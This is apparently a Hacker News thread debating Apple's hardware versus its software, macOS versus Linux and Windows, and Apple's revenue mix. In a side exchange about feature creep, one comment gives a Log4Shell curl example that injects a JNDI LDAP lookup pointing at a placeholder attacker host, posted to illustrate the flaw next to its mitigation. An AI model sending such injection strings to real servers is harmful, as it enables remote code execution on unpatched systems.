              Notice the OP said Unix, not Linux. GNU made a lot of incompatible changes to the Unix tools it was cloning. Many people in the Linux community prefer the GNU quirks (they are definitely more performance-optimized, for example). But if you are talking about Unix, the FreeBSD-derived userland on a Mac has real Unix lineage.

            • epistasis 19 hours ago

              If you want the GNU versions of tools rather than the Mac POSIX versions, then brew can help replace your bin directory with all the GNU niceties.

              If you're talking about hardware interaction from the command line, that's very different and I don't think there's a fix.

        • pxc 20 hours ago

          Fully supported Linux + proper suspend-to-RAM are the two things I want out of Apple Silicon and may never quite get. Better online low power states are fine, but I want suspend-to-RAM and suspend-then-hibernate.

          If I close my laptop for a few days, I don't want significant battery drain. If I don't use it for two weeks, I want it to still have life left. And I don't want to write tens of gigabytes to disk every time I close the lid, either!

          • zozbot234 19 hours ago

            What happens if you enable airplane mode before closing the laptop? That should power down all radios so battery drain should be approximately equivalent to S3 standby.

          • ValdikSS 18 hours ago

            Sleep states are not trivial from the security perspective, and they've eliminated the issue by just not allowing it :)

            • astrange 16 hours ago

              It does hibernate. It just takes a long time to do it because the experience of waking up from it is bad.

        • geodel 20 hours ago

          "Fully supported by whom" is the issue and important one. Apple won't do it and going by support from "most people around here" Hector Martin et al got crumbs for years, nowhere near to support the development.

          One can just hand wave "Apple must support Linux and all" but that is not going to get anything done.

        • 7e 19 hours ago

          Linux is a vanity and the illusion is only skin-deep. The overall UX truly sucks.

          • artisin 16 hours ago

            The UX only sucks if you're unwilling to put in a minimal amount of time and effort. After that, it has no equal; it is, by definition, the opposite of vanity.

          • KeplerBoy 18 hours ago

            Which illusion? It's a computer, no more, no less and Linux is a perfectly fine interface to that computer.

          • rowanG077 17 hours ago

            I don't understand. From a pure visual standpoint OSX wins; Linux is not particularly known for looking good or cohesive. But in basically all other matters it beats the pants off OSX.

        • Romario77 20 hours ago

          Linux UI is crap compared to Mac.

          It's a server or developer box first and a non-technical user second.

          • timschmidt 20 hours ago

            I've felt the opposite for more than a decade. On Linux, it's relatively easy for me to choose a set of applications which all use the same UI toolkit. Additionally, the web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function. Linux was the first OS with an "app store" (the package manager). CLI utilities available tend to be the full fat versions with all the useful options, rather than minimalist versions there to satisfy posix compatibility. I could go on.

            On Linux there is variety and choice, which some folks dislike.

            But on the Mac I get whatever Apple gives me, and that is often subject to the limitations of corporate attention spans and development budgets.

            • robenkleene 15 hours ago

              > The web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function.

              Should Emacs and Vim both be called "Editor" then?

              To me, this is actually a great example of the problems with Linux as a community: GUI applications seem to be treated as placeholders (e.g., all word processors are the same?), but then it's inconsistent in celebrating the unique differences between editors like Vim and Emacs. Photoshop, Excel, Logic Pro, and Final Cut Pro are, in my opinion, crown jewels of what we've accomplished in computing, and by extension some of the greatest creations of the human race, democratizing tasks that in some cases would have cost millions of dollars before (e.g., a recording studio in your home). Relegating these to generic names like "spreadsheet" makes them sound interchangeable, when in my opinion they're each individual creations of great beauty that should wear their names with pride. They've helped improve the trajectory of the human race by letting many individuals perform tasks they never would have had the resources to do otherwise.

              • timschmidt an hour ago

                > Should Emacs and Vim both be called "Editor" then?

                I've used some distributions in which they were. Tooltips and icons were provided to disambiguate. Worked for me.

                Other distributions name applications explicitly, some place them in a folder together named "Editors".

                None of the distributions I've used place either in a corporate branded subfolder as is typical on Windows and Mac.

                Freedom of choice is wonderful.

            • MichealCodes 20 hours ago

              > limitations of corporate attention spans and development budgets

              And arbitrary turf wars, like their war against web APIs/apps, causing more friction for devs and end users.

              • ahartmetz 16 hours ago

                I'm a Linux fan and I like that Apple isn't rubber-stamping the two new web APIs a week that Google comes up with. There are hundreds of them, most of them quite small fortunately.

          • gedy 20 hours ago

            That was maybe the case 10+ years ago, but honestly, I've been using Fedora with GNOME on my M1 and it's pretty polished and nice now.

          • markus_zhang 20 hours ago

            [flagged]

            • jll29 19 hours ago

              You are right in saying that discoverability has suffered a lot from the hidden scrollbars and similar changes. Also, you need to move the mouse precisely to a particular spot to re-enable the scrollbars; there is little wiggle room, which may make things harder for handicapped people, older users, or people on the move (e.g. me on a train).
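
              (For what it's worth, the long-standing global preference to keep scrollbars permanently visible still works; the same setting is also exposed in System Settings > Appearance:)

                  # always show scrollbars instead of auto-hiding them
                  defaults write NSGlobalDomain AppleShowScrollBars -string "Always"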

              • markus_zhang 16 hours ago

                Yeah, e.g. when you have a very short scrollbar and have to guess where it is for more than 5 seconds... I've kind of grown past the hype; nada, going back to Winux.

                It is SUCH a pity that they have extraordinary hardware (even at the price point I'd still consider it a bargain, especially for the Air/Mini)...

            • MichealCodes 19 hours ago

              Or just the way the menus are in apps. Some apps implement their own file/edit/view menus at the top of the app, while some use the Apple version at the top of the OS. If you plug in a TV to use as a monitor and cannot adjust the aspect ratio, you're forced to blindly activate these menus as they're clipped from the screen.

              MacOS folder navigation is a complete pain too: sometimes you see the list of OS folders, sometimes only the folder you opened in Finder. If the menu is clipped due to the above aspect ratio problem, good luck getting to your home folder... There's no functionality to easily open a folder in a terminal. Lots of the basics are just counter-intuitive.

              • markus_zhang 15 hours ago

                Yeah, I found it not easy to go up one level in Finder; I actually had to Google it the first time I tried. The way that MacOS wants to conceal information from its users is just insane. I don't know how it is justified. Nevertheless, it has a good number of ardent fans.

      • foobarian 15 hours ago

        To me it's not a MacOS vs Windows thing. It's a hardware build quality thing for sure; but even more importantly it's the integration with the OS. Now, you could say we could get a team together and integrate Windows too, but the problem is this is vastly more effective when the hardware and software are co-designed in the same house with strong feedback loops. As a result Apple's product will inevitably be better than those without such an organizational backbone.

        Quoth the Tao of Programming:

        8.4

        Hardware met Software on the road to Changtse. Software said: "You are Yin and I am Yang. If we travel together, we will become famous and earn vast sums of money." And so they set forth together, thinking to conquer the world.

        Presently, they met Firmware, who was dressed in tattered rags and hobbled along propped on a thorny stick. Firmware said to them: "The Tao lies beyond Yin and Yang. It is silent and still as a pool of water. It does not seek fame; therefore, nobody knows its presence. It does not seek fortune, for it is complete within itself. It exists beyond space and time."

        Software and Hardware, ashamed, returned to their homes.

      • qwertytyyuu 20 hours ago

        These days I'd rather have a MacBook running Windows than macOS running on a standard Windows laptop of the same form factor, purely for the efficiency of Apple Silicon.

        • floam 16 hours ago

          It wouldn’t be so power efficient anymore.

      • klooney 17 hours ago

        Advertisements in Windows seem like a deal breaker to me, but I've been gone for a while.

      • lenkite 19 hours ago

        Windows would have beaten MacOS if Microsoft had just done one small, teeny-weeny thing: left the OS alone after Win 10.

        • xedrac 19 hours ago

          I haven't been able to stomach Windows since Vista, and I can barely stomach MacOS. Linux has spoiled me.

        • dysoco 15 hours ago

          Oh, but they absolutely did beat MacOS. The number of people who give a damn about UI polish, response times, etc. is insignificant to them.

          They got away with pushing ads, online and enterprise services, Copilot, etc. to every desktop user.

        • NetMageSCW 11 hours ago

          I think you meant to say Windows 7…

        • leptons 17 hours ago

          It depends on what you mean by "beat". Windows has a vastly larger market share than Apple ever has had, or ever will.

      • lotsofpulp 19 hours ago

        Seeing my wife have to deal with BSODs, tedious restarts for Windows updates, and myriad other issues just to use Teams/Excel makes me think the software issues are far worse on the Windows side.

        Not once in 10 years have I had to troubleshoot while she uses her personal macOS machine, but a Dell Latitude laptop in 2025 still can’t just “open lid, work, close lid”.

        And it’s slower. And eats more battery.

    • larodi 17 hours ago

      Curiously, every big player/vendor doing something remotely relevant to GPU/NPU/APU etc. sees massive growth. Apple's M-processors are much better in terms of price/value ratio for current ML pipelines. But Apple does not have a server line, which seems to be a massive problem for their products, even though those products actually compete with Nvidia in the consumer market, which is a very substantial position, software or not.

      AMD was also lagging with drivers, but now we see OpenAI swearing they're going to buy loads of their products, something so many people were not in favor of just 5-7 years ago.

  • samwillis 20 hours ago

    Software is very easy to bloat, expand scope, and grow to do more than really needed, or just to release apps that are then forgotten about.

    Hardware is naturally limited in scope due to manufacturing costs, and doesn't "grow" in the same way. You replace features and components rather than constantly add to them.

    Apple needs someone to come in and aggressively cut scope in the software, removing features and products that are not needed. Pare it down to something manageable and sustainable.

    • pxc 20 hours ago

      > pare down products and features

      macOS has way too many products but far too few features. In terms of feature-completeness, it's already crippled. What OS features can macOS afford to lose?

      • coredog64 20 hours ago

        I would say it's less about losing and more about focus. Identify the lines of business you don't want to be in and sell those features to a third party who can then bundle them for $1/$10/$20. A $2T company just doesn't care, but I would bet that those excised features would be good enough for a smaller software house.

        (I have the same complaint about AWS, where a bunch of services are in KTLO and would be better served by not being inside AWS)

    • 6SixTy 17 hours ago

      macOS has like no features already, and they keep removing more.

    • panick21_ 19 hours ago

      If you think hardware can't bloat, I suggest you look into the history of Intels attempt to replace x86. Or the VAX. Not to mention tons of minicomputer companies who built ever more complex minis. And not to mention the supercomputer startup bubble.

  • geodel 21 hours ago

    Well, besides software that runs in data centers/cloud, most other software is turning to crap. And people who think this crap is fine have now reached positions of responsibility at a lot of companies. So things will only get worse from here.

    • sho_hn 20 hours ago

      Except community-developed open source software, which (slowly, perhaps) keeps getting better and has high resistance to enshittification.

      • geodel 20 hours ago

        The OSS that keeps getting "better" is the kind that accepts a lot of user feature requests and/or implementations; otherwise, the maintainers are hostile to users. And when they do accept most of those requests and code, we all know how it goes.

      • NetMageSCW 11 hours ago

        Tell that to the people who run GIMP development. Open source doesn’t protect from bad decisions and bad directions.

      • Noaidi 20 hours ago

        This right here is moving me back to GrapheneOS and Linux. I was lucky enough to be able to uninstall Liquid Glass before the embargo. I will miss the power efficiency of my M1, but the trade-offs keep looking better and better.

        Being poor, I need to sell my MacBook to get money to pay off my 16e, then sell the 16e and use that money to buy a Pixel 9, then probably buy a ThinkPad X1 Carbon. Just saying all that to show you the lengths I am going to to boycott/battle the enshittification.

        • pbronez 20 hours ago

          If you already have an M1 MacBook, why not run Asahi Linux?

          • Noaidi 19 hours ago

            Is it functional yet? Last I looked at it was about a year ago. Do you have any real use experience of it?

            • kroaton 13 hours ago

              Look higher up in the thread, someone did a full breakdown.

      • Aperocky 20 hours ago

        Remember log4j? I don't share your enthusiasm.

        At least it's open source and free, I guess.

        • jacquesm 20 hours ago

          What even is your point? That open source has bugs? That closed source doesn't have such bugs?

          • Aperocky 19 hours ago

            You wouldn't have that bug if the logger weren't trying to talk to some LDAP server.

            It's not even about open source or closed source at this point. It's about feature creep.

            • bzzzt 19 hours ago

              It's not talking to an LDAP server; it's the functionality for talking to an LDAP server that is causing the issue. Even if you don't need LDAP, you're still vulnerable when a client can inject information into a log message.
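
              To make that concrete: against an unpatched log4j 2.x (before 2.15), any string the server happens to log can carry the lookup. A minimal sketch, with hypothetical hostnames:

                  # the app never 'uses' LDAP; merely logging this header triggers the JNDI lookup
                  curl -H 'User-Agent: ${jndi:ldap://attacker.example/a}' https://victim.example/login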

              • Aperocky 14 hours ago

                Why is this functionality needed in the first place? I want to write logs (some kind of string) into some kind of file, with rotation, maybe even send them somewhere that expects logs.

                Why parse whatever is in the logs at all?

                Imagine the same thing in your SSH client: it parses the content before sending it over because some feature requires it to talk to some server somewhere. It's insanity.

                • bzzzt 13 hours ago

                  Log4j contains a very big collection of extensions for just about anything, including inserting data from various sources. Of course it's overkill for lots of situations, but nobody ever uses all the functionality. It's just that nobody can agree on which functionality is useless ;)

          • geodel 19 hours ago

            Indeed, software used by thousands of commercial products and millions of enterprise applications, with ZERO dollars of support from either, must be maintained at a perfect, bug-free level by lazy volunteers. Because the internet demands it.

            • bzzzt 19 hours ago

              Would it even be possible to create today's software ecosystems by mandating all libraries are maintained and supported to the strictest standards?

              That would be the end of open source, hobbyists, and startup companies, because you'd have to pay up just to have a basic C library (or hope some companies would have reasonable licensing and support fees).

              Remember one of the first GNU projects was GCC because a compiler was an expensive, optional piece of software on the UNIX systems in those days.

              • jacquesm 18 hours ago

                That would be the end of the software industry. No company outside of aerospace and medical devices is capable of delivering this and I even have my doubts about those two, though at least they are trying.

        • usefulcat 20 hours ago

          That was a bug, not at all the same thing as enshittification.

          • Aperocky 19 hours ago

            It was enshittification. A logging framework that looks up LDAP servers? Why?

            Adding extra features that aren't necessarily needed is enshittification, and very not-unix.

            • bzzzt 19 hours ago

              It's not really added functionality, more an unintended consequence of too much flexibility. Java contains JNDI (Java Naming & Directory Interface), a very unified 'directory' system for all kinds of configuration, of which LDAP is just one of the backend implementation options. The key issue is that you can call into other objects, which is unwise when used with untrusted user input.
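
              Which is also why one stopgap at the time was to switch the lookup machinery off wholesale (a real log4j system property, available since 2.10) rather than remove any particular "feature":

                  # disable message lookups entirely; app.jar stands in for your application
                  java -Dlog4j2.formatMsgNoLookups=true -jar app.jar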

              • Aperocky 14 hours ago

                > The key issue is you can call into other objects which is unwise to do when used with untrusted user input.

                This, and while in this case it is specifically unwise in security terms, there are plenty of other examples where the features are completely cosmetic and deviate from the core user requirements/scenarios.

  • SCdF 19 hours ago

    I don't think it's the modern Apple, I think that's just Apple.

    I remember using iTunes when fixing the name of an album was a modal blocking function that had to write to each and every MP3, one by one, in the slowest write I have ever experienced in updating file metadata. Give me a magnetised needle and a steady hand and I could have done it faster.

    A long time ago they had some pretty cool design guides, and the visual design has often been nice, but other than that I don't think their software has been notable for its quality.

    • robenkleene 17 hours ago

      Apple makes Logic Pro, Final Cut Pro, Notes, Calendar, Contacts, Pages, Numbers, Keynote, Freeform, just from a "quality" standpoint, I'd rank any of those applications as competitive for the "highest quality" app in their category (an admittedly difficult thing to measure). In aggregate, those applications would make Apple the most effective company in the world at making high-quality GUI applications.

      Curious if I'm missing something though, is there another entity with a stronger suite than that? Or some other angle to look at this? (E.g., it seems silly to me to use an MP3 metadata example when you're talking about the same company that makes Logic Pro.)

      • SCdF 15 hours ago

        Of those apps you've listed that I've used, none of them have been notable for being high quality to me, though as you say it's difficult to measure. For me I would rate them somewhere between unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote). If you asked me to guess what desktop software Apple makes that people rate highly, I never would have guessed any of those, except _maybe_ Logic[1] and Final Cut, though ironically those are two of the three I've never used.

        I also think you're confusing what I wrote. It's not a competition.

        I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

        [1] and now from a sibling comment I hear that perhaps people regard that tool as bad, so there you go, the jury is clearly out

        • robenkleene 14 hours ago

          What software do you find to be higher quality and why? That's the only valid way of even trying to have this conversation.

          E.g., I'd rank something like VS Code "lower quality" because when I launch VS Code, I can see each layer of the UI pop in as it's created: first I see a blank window, then I see window chrome being loaded, then I see a row of icons being loaded on the left. This gives an impression of the software not being solid, because it feels like the application is struggling just to display the UI.

          > I also think you're confusing what I wrote. It's not a competition.

          > I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

          I disagree with this; the only way to make an argument that Apple has deficiencies in their software is to demonstrate that other software is higher quality than Apple's. Otherwise it could just be that Apple's quality level is the maximum feasible level of quality.

          > unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote).

          This is laughable. Notes is unremarkable? Give me a break. And Keynote is awkward? Have you ever Googled how people feel about these applications?

          I'd argue a critic only has value if they're willing to offer their own taste for judgement.

      • bigyabai 15 hours ago

        Do you regularly use the alternatives to these programs? Admittedly I'm not cut out to judge the office suite, but the consensus in the music world seems to be that Logic Pro is awful. It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live. Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition. Don't even get me started on the number of pros I see willingly use Xcode...

        It's not exactly clear to me what niche Apple occupies in this market. It doesn't feel like "native Mac UI" is a must-have feature for DAWs or IDEs alike, but maybe that's just my perspective.

        • robenkleene 14 hours ago

          Yes, I use Ableton Live every day.

          > It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live.

          This is an obviously silly statement: not only is Logic Pro competitively priced ($200, relative to $100-$400 for Bitwig and $99-$750 for Live), but those applications obviously have different focuses than Logic Pro (sound design and electronic music, versus the more general-purpose recording focus of Logic Pro). Also, you'd be hard pressed to find anyone who doesn't think Logic Pro comes with the best suite of stock plugins of any DAW, so the value prop angle is a particularly odd argument to make (i.e., Logic Pro is pretty obviously underpriced).

          But all this isn't that important because many of these applications are great. DAWs are one of the most competitive software categories around and there are several applications folks will vehemently defend as the best and Logic Pro is unequivocally one of them.

          > Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition.

          This is old, but curious if you have a better source for your statement https://blog.robenkleene.com/2019/06/10/2015-digital-audio-w...

          Found a more recent survey https://www.production-expert.com/production-expert-1/2024-d...

          > We can see that Pro Tools for music is the most popular choice, with Logic for music second and Pro Tools for post coming third.

          Note that I'd say Logic Pro's popularity is actually particularly notable since it's not cross-platform, so the addressable market is far smaller than the other big players'. It's phenomenally popular software, both in terms of raw popularity and the fans who rave about it. E.g., note the contrast in how people talk about Pro Tools vs. Logic Pro: Logic Pro has some of the happiest users around, but Pro Tools customers talk like they're hostages to the software. That difference is where the quality argument comes in.

          • bigyabai 12 hours ago

            That is an awfully large amount of text for what amounts to an admission that Logic Pro is lower-quality software than Pro Tools. Your comment reeks of all the hallmarks of Reality Distortion Syndrome; while I'm willing to argue on the merits, you simply sound smitten by Apple's (rapidly degenerating) acumen for visual design. In the other response, you're telling off a perfectly valid criticism of Apple software because they won't fulfill your arbitrary demand for a better-looking DAW. Are you even engaging with the point they're trying to make?

            I'm sorry to say it, but I genuinely think you're detached from the way professionals evaluate software. While I enjoyed my time on macOS when Apple treated it like a professional platform, I have no regrets leaving it or its "quality" software behind. Apple Mail fucking sucks, iCloud is annoying as sin, the Settings app only got worse year-over-year, and the default Music app is somehow slower than iTunes from 2011. Ads pop up everywhere, codecs and filesystems go unsupported due to greed, and hardware you own gets randomly deprecated because you didn't buy a replacement fast enough.

            If that's your life, go crazy. People like you helped me realize that Macs aren't made for people like me.

            • robenkleene 11 hours ago

              > That is an awfully large amount of text for what amounts to an admission that Logic Pro is lower quality software than Pro Tools.

              I definitely didn't say this. Pro Tools likely has higher marketshare than Logic Pro, but I don't think anyone would conflate that with quality. I only brought up marketshare because you framed Logic Pro as being unpopular, which is just objectively not true.

              > I'm sorry to say it, but I genuinely think you're detached from the way professionals evaluate software.

              I literally think I've spent more time trying to understand this than practically anyone else e.g., https://blog.robenkleene.com/2023/06/19/software-transitions... but also my blog archives https://blog.robenkleene.com/archive/, it's one of the main subjects I think about and write about.

              Note that how professionals evaluate software is tangential to what "quality" means in the context of software. E.g., I don't think anyone would argue Adobe is the paragon of software quality, but they're arguably the most important GUI software there is for creative professionals.

              Both topics are very interesting to me, what software professionals use and why, and what constitutes quality in software.

              > In the other response, you're telling off a perfectly valid criticism of Apple software because they won't fulfill your arbitrary demand for a better-looking DAW. Are you even engaging with the point they're trying to make?

              I'm not sure what this means, who's talking about a "better-looking DAW" and which point am I not engaging with?

  • alexanderson 21 hours ago

    Apple has always been a hardware company first - think of how they sell consumers computers with the OS for free, while Microsoft primarily just sells the OS (when comparing the consumer business; I don’t want to get into all the other stuff Microsoft does).

    Now that they own the SoC design pipeline, they’re really able to flex these muscles.

    • ViktorRay 19 hours ago

      Steve Jobs himself said that Apple sees itself as a software company

      https://youtu.be/dEeyaAUCyZs

      The above link is a video where he mentions that.

      It is true that Apple’s major software products like iOS and MacOS are only available on Apple’s own hardware. But the Steve Jobs justification for this (which he gave in a different interview I can’t find right now, so I will paraphrase) is that he felt Apple made the best hardware and software in the world, so he wanted Apple’s customers to experience the best software on the best hardware possible, which he felt only Apple could provide. (I wish I could find the exact quote.)

      Anyway according to Steve Jobs Apple is a software first company.

      • hinkley 11 hours ago

        But Steve also clearly believed in Alan Kay's old aphorism:

        If you care about software you have to make your own hardware.

        I'll allow that perhaps Apple considers hardware a means to an end. But what an end.

    • alt227 20 hours ago

      Apple has always been a software-first company; they only sell the hardware as a vehicle for their software. They regularly say this themselves and have always called themselves a software company. Compare their hardware revenues with those of the App Store and iCloud subscriptions and you will see where they make most of their money.

      EDIT: I seem to be getting downvoted, so I will just leave this here for people to see I am not lying:

      https://www.businessinsider.com/tim-cook-apple-is-not-a-hard...

      • achierius 20 hours ago

        > Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

        Yes, it's $70B a year from iPhones alone and $23B from the totality of the Services org. (including all app store / subscription proceeds). Significantly more than 50% of the company's total profits come from hardware sales.

        • ertgbnm 20 hours ago

          In addition, making money off the software that others develop and sell on the app store doesn't make Apple more of a software company, it makes them a middle man.

          • alt227 19 hours ago

            IMO a middle man means you are in between 2 other services, taking a cut off the top. In this instance, Apple not only created and curates the App Store, but also invented the concept. In this case they are definitely not a middle man; they are a software company selling access to their software to developers.

        • alt227 19 hours ago

          Where are you getting these numbers from, care to share source?

          We should be comparing profit on those departments not revenue. Do you have those figures?

          It is well known that companies often sell the physical devices at a loss in order to make the real money from the services on top.

          • adastra22 18 hours ago

            Apple does not sell hardware at a loss.

            • alt227 18 hours ago

              Yeah, everyone says stuff like this, but nobody can actually produce any reliable sources to show how much profit it actually makes. So until you can, it's all guesswork.

              • adastra22 17 hours ago

                Apple is a public company. You can find the numbers (broken down into product aka hardware vs service) here: https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

                • alt227 17 hours ago

                  Feel free to do the maths and prove me wrong then.

                  • adastra22 11 hours ago

                    The numbers are literally right there. Did you click the link? In the last quarter, they had $67B in hardware sales, with $45B as costs for that division. That’s a profit margin (hardware only) of about 33%. They are not losing money on hardware.

      • dylan604 19 hours ago

        Apple has always? Sure, maybe today, with collecting a % of app sales, it looks like a software company. If there were no iDevices, there'd be no need for an App Store. Your link is all about Cook, yet he was not always the CEO. Woz didn't care what software you ran; he just wanted the computer to be usable so you could run whatever software. Jobs wanted to restrict things, but it was still about running the hardware. Whatever Cook thinks Apple is now does not mean it has always been that, as you claim.

        • alt227 17 hours ago

          You know, you might just have a point if you weren't completely making that all up.

          Steve Jobs consistently made the point that Apple's hardware is the same as everyone else's; what makes them different is that they make the best software, which enables the best user experience.

          Here see this quote from Steve Jobs which shows that his attitude is the complete opposite of what you wrote.

          https://www.youtube.com/watch?v=dEeyaAUCyZs

      • jsnell 20 hours ago

        Sure, let's compare.

        Apple's product revenue in this fiscal year has been $233B, with a gross margin of $86B.

        Their services revenue is $80B with $60B gross margin.

        • justincormack 20 hours ago

          Much of the service revenue is the payment from Google for search placement.

        • alt227 19 hours ago

          Source?

          • jsnell 16 hours ago

            Good grief. Apple's official financials.

            https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

            Look, I totally understand making an off-hand comment like you did based on a gut feeling. Nobody can fact-check everything they write, and everyone is wrong sometimes. But it is pretty lazy to demand a source when you were just making things up. When challenged with specific and verifiable numbers, you should have checked the single obvious source for the financials of any public company: their quarterly statements.

      • ksec 20 hours ago

        It goes back even further, Steve Jobs said Apple is a software company, you just have to buy its hardware to use it. It is the whole experience.

      • wat10000 20 hours ago

        I did that comparison and they make the vast majority of their money on hardware. Half of their revenue is iPhone, a quarter is services, and the remaining quarter is divided up among the other hardware products.

        Regardless of revenue, Apple isn't a hardware company or a software company. It's a product company. The hardware doesn't exist merely to run the software, nor does the software exist merely to give functionality to the hardware. Both exist to create the product. Neither side is the "main" one, they're both parts of what ultimately ships.

        • alt227 16 hours ago

          > The hardware doesn't exist merely to run the software

          Watch this and maybe you might change your mind:

          https://www.youtube.com/watch?v=dEeyaAUCyZs

          • wat10000 14 hours ago

            I think he's saying software is essential, not that it's the only thing. He contrasts the iPod with products from Japanese companies, which tend to make great hardware with crap software, and that software difference is why the iPod beat them.

            Modern Apple is also quite a bit more integrated. A company designing their own highly competitive CPUs is more hardware-oriented than one that gets their CPUs off the shelf from Intel.

        • alt227 19 hours ago

          Do the same calculation for profit instead of revenue.

          • wat10000 14 hours ago

            Are those numbers available? In any case, the comment said revenue, not profit.

      • HumblyTossed 20 hours ago

        Tim is the CEO, he's going to say whatever he needs to in the moment to drive investment.

        Apple is and always has been a HW company first.

        • alt227 19 hours ago

          OK, so I guess when the CEO of a company explicitly says something about their company, we should just ignore it because he is 'in the moment'?

    • Hamuko 21 hours ago

      Not really. Back in the day you wouldn't buy a MacBook because it was powerful. Most likely it had a very shitty Intel CPU without a lot of cores and with thermal challenges, and the reason you bought it was macOS.

      • chasil 20 hours ago

        And in many decades past, OpenStep was slowly moving its GUI from NeXT hardware to software sales on various UNIX platforms and Windows NT.

        And this would eventually evolve into MacOS.

        https://en.wikipedia.org/wiki/OpenStep

      • fnord123 20 hours ago

        The Intel laptops also grounded themselves through the user. I still can't believe they didn't do a recall to sort that out.

        • hinkley 11 hours ago

          The tingling just lets you know you're alive.

      • alt227 20 hours ago

        > very shitty Intel CPU with not a lot of cores and with thermal challenges

        Very often the Intel chips in MacBooks were stellar; they were just seriously inhibited by Apple's terrible cooling designs and so were permanently throttled.

        They could never provide decent cooling for the chips, coupled with their desire to make paper-thin devices.

        • kllrnohj 19 hours ago

          > They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

          Curiously they managed to figure this out exactly when it became their silicon instead (M1 MacBook Pros were notably thicker and with more cooling capacity than the outgoing Intel ones)

          • alt227 19 hours ago

            I still believe they purposefully throttled the last generation of Intel Macs just to make people have bad memories of them.

          • bzzzt 19 hours ago

            I presume they were just playing it safe to not let the M1 migration flop. If you're dragging your users through a big migration the last thing you need is complaints about the new hardware...

        • scrlk 20 hours ago

          They made things even worse with fan curves tuned for silence until the CPU was practically at TjMax.

      • hamdingers 17 hours ago

        Nope, many bought it in spite of macOS because it was a durable laptop with an excellent screen, good keyboard, and (afaik still) the only trackpad that didn't suck.

        • NetMageSCW 11 hours ago

          I think “many” is doing a lot of heavy lifting there.

      • leptons 16 hours ago

        >the reason you bought it was because macOS.

        That is probably the least of reasons why people buy Apple - to many it's just a status symbol, and the OS is a secondary consideration.

      • qwertytyyuu 20 hours ago

        Not just macOS: also the decent keyboard and actually good display, guaranteed.

  • fidotron 21 hours ago

    What I would do for Snow Leopard on the M class hardware.

    • RossBencina 20 hours ago

      You could run it in an emulator.

    • sys_64738 12 hours ago

      The SL GUI enhancements live with us to this day.

    • asimovDev 19 hours ago

      do you mean literally 10.6 on AS or do you mean something as good as it was

      • fidotron 19 hours ago

        Something that good.

        It was coherent, (relatively) bug-free, and lacked the idiot-level iOSification and nagging that is creeping in all over MacOS today.

        I hadn't had to restart Finder until recently, but now even that has trouble with things like network drives.

        I'm positive there are many internals today that are far better than in Snow Leopard, but it's outweighed by user visible problems.

        It shouldn't surprise you I think that Android Jelly Bean was the best phone OS ever made as well, and they went completely in the wrong direction after that.

        • astrange 18 hours ago

          It was very easy to lose data in Snow Leopard because they hadn't introduced the document autosave system yet. That was the next version.

          • fidotron 17 hours ago

            You mean it only did things you told it to do? That's a feature.

            Programs could absolutely have much more controllable autosave before, for when it made sense.

            • astrange 15 hours ago

              "I lose work when the power goes out" is not a feature. Neither is "I can't apply security updates because I can't restart".

              Speaking of security it didn't have app sandboxing either.

              • fidotron 15 hours ago

                You mean programs could access the file system normally? They were absolutely isolated, as standard Unix processes.

                This is what I mean about iOSification: it's trending towards being a non-serious OS. Linux gets more attractive by the day, and it really is the absence of proper support for hardware in the class of the M series that prevents a critical mass of devs from jumping ship.

                • astrange 12 hours ago

                  The only Unix security boundary is between users. There isn't a standard boundary between "a web browser tab" and "the file with your credit card info in it".

  • whitehexagon 19 hours ago

    I dunno, didn't they already crack 400GB/s memory bandwidth some years ago? This seems like just another small bump to handle the latest OS effects sludge.

    Now the M1 range, that really was an impressive 'outperform' moment of engineering for them, but otherwise this is just a clockwork, MBA-driven trickle of slightly better over-hyped future e-waste.

    To outperform during this crisis, hardware engineers worth their salt need to be designing long-lived boxes with internals that can be easily repaired or upgraded. "Yeah, but the RAM connections are fiddly." Great, now that sounds like a challenge worth solving.

    But you are right about the software. Installing Asahi makes me feel like I own my computer again.

    • astroflection 19 hours ago

      https://asahilinux.org/

      "Linux on Apple Silicon: Asahi Linux aims to bring you a polished Linux® experience on Apple Silicon Macs."

      Why the "®" after Linux? I think this is the first time I've seen this.

      • utf_8x 18 hours ago

        The Linux "brand" is trademarked by Linus Torvalds, presumably to stop things like "Microsoft® Linux®" from happening...

  • thomascgalvin 20 hours ago

    > The modern Apple feels like their hardware teams way outperforming the software teams.

    There aren't a lot of tangible gains left to be made by the software teams. The OS is fine, the office suite is fine, the entertainment apps are fine.

    If "performance" is shoving AI crap into software that was already doing what I wanted it to do, I'd rather the devs take a vacation.

    • butlike 20 hours ago

      There were a few things on that page that made me excited for the future of where computing is going, but I do think we're going to hit a "lull" in terms of exciting new features until some of the really futuristic stuff comes to pass.

      Who knows, maybe the era of "exciting computing" is over, and iteration will be a more pleasant and subtle gradient curve of improvements, over the earth-shattering announcements of yore (such as the advent of popular cellular phones).

      • scbzzzzz 19 hours ago

        True. I would like to hijack this thread to discuss what we want from software that doesn't exist yet. For me, all I can think of is on-device AI/ML (photo editing, video editing, etc.), and not the kind the current companies are trying so hard to shove down our throats.

        Maybe Steve was right: we don't know what we want until someone shows it to us.

  • RataNova an hour ago

    That's been the vibe for a while now

  • tyrellj 19 hours ago

    This seems to be pretty true in general. SBC companies are not competing with Raspberry Pi because their software is quite a bit behind (boot loaders, Linux kernel support, etc). Particle released a really cool dev board recently, but the software is lacking. Qualcomm struggled with poor support at their new CPU launch as well. It sometimes takes a while for new Intel processor features to be supported in the toolchains and kernel, and then get used in software.

    Aside from that, I think of Apple as a hardware company that must write software to sell its devices; maybe this isn't true anymore, but that's how I used to view them. Maintaining and updating as much software as Apple owns is no small task either.

  • textlapse 15 hours ago

